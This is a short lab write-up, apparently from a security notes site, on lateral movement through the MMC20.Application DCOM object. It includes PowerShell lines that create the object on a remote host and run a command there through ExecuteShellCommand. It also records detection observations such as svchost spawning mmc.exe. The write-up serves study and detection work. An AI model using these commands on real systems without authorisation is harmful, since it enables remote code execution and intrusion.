Lateral Movement via DCOM
Lateral Movement via Distributed Component Object Model
The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.
This lab explores a DCOM lateral movement technique using MMC20.Application COM as originally researched by @enigma0x3 in his blog post Lateral Movement using the mmc20.application Com Object

Execution

MMC20.Application COM class is stored in the registry as shown below:
Same can be achieved with powershell:
1
Get-ChildItem 'registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\{49B2791A-B1AE-4C90-9B8E-E860BA07F889}'
Copied!
Establishing a connection to the victim host:
1
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
Copied!
Executing command on the victim system via DCOM object:
1
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c hostname > c:\fromdcom.txt","7")
Copied!
Below shows the command execution and the result of it - remote machine's hostname command output is written to c:\fromdcom.txt:

Observations

Once the connection from an attacker to victim is established using the below powershell:
1
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
Copied!
This is what happens on the victim system - svchost spawns mmc.exe which opens a listening port via RPC binding:
A network connection is logged from 10.0.0.7 (attacker) to 10.0.0.2 (victim) via offense\administrator (can be also seen from the above screenshot):

References

Lateral Movement using the MMC20.Application COM Object
enigma0x3
View ExecuteShellCommand method
docsmsft
Type.GetTypeFromCLSID Method (System)
docsmsft
COM Technical Overview - Win32 apps
docsmsft
https://attack.mitre.org/wiki/Technique/T1175
attack.mitre.org
Last modified 3yr ago